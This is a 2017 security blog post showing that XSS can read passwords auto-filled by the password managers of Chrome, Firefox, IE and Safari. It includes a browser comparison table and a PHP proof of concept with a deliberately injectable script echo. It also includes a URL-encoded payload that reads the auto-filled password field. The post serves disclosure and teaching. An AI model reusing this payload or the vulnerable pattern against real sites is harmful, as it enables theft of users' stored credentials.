2017年1月23日月曜日

Password Stealing from Password Manager of Modern Browsers

Stealing passwords from McDonald's users became a topic of conversation. This article was translated and be mentioned in the Japanese web media. Of course, XSS is a typical security flaw and should be addressed, but it looks that McDonald's password manager issue is a just general issue of password manager.

Let's see password managers on modern browsers.
 Table. An attacker can steal stored user password on the password manager by XSS?

Auto filledCan be stealed?
IE11No (Requires user operation)Yes (Requires user operation) *1
Chrome 55.0.2883.87YesYes
Firefox 50.1.0YesYes
Safari 10.0.2No (Requires user operation)Yes (Requires user operation)
*1 IE's XSS filter is difficult to defeat if attack vector is reflected one.

Once Chrome or Firefox users save passwords to the password manager, an attacker can steal passwords by XSS. (Chrome doesn't allow read password field without user interaction when users move to XSSed page from a tag. But it seems that it is not intended behavior.)
In McDonald's case, an attacker must find encryption key and decrypt encrypted cookie but these password managers don't require complicated attack vectors. Just do XSS and read password field!

Step 1. Input your ID/password and submit them to the server.


Step 2. Save password to your browser.


Step 3.  XSS and steal password from auto filled password field.


I put my sample code described below on my test server: http://133.242.134.241/exploit/password_manager.php

If you want to XSS from other site, please try this.

Sample code:
<body>
<?php
if(!isset($_GET{"xss"}) && !isset($_POST{"pass"})) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
}else {
?>
Please click below to fire XSS after save your password to password manager.<br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=id%3E%3Cinput%20type=password%20name=pass%3E%27%3bi=setInterval(function(){p=document.forms[0].pass.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">Fire XSS!</a>
<script>
  var a='< ?php echo $_GET{"xss"} ? >';
</script>
<?php
}
?>
</body>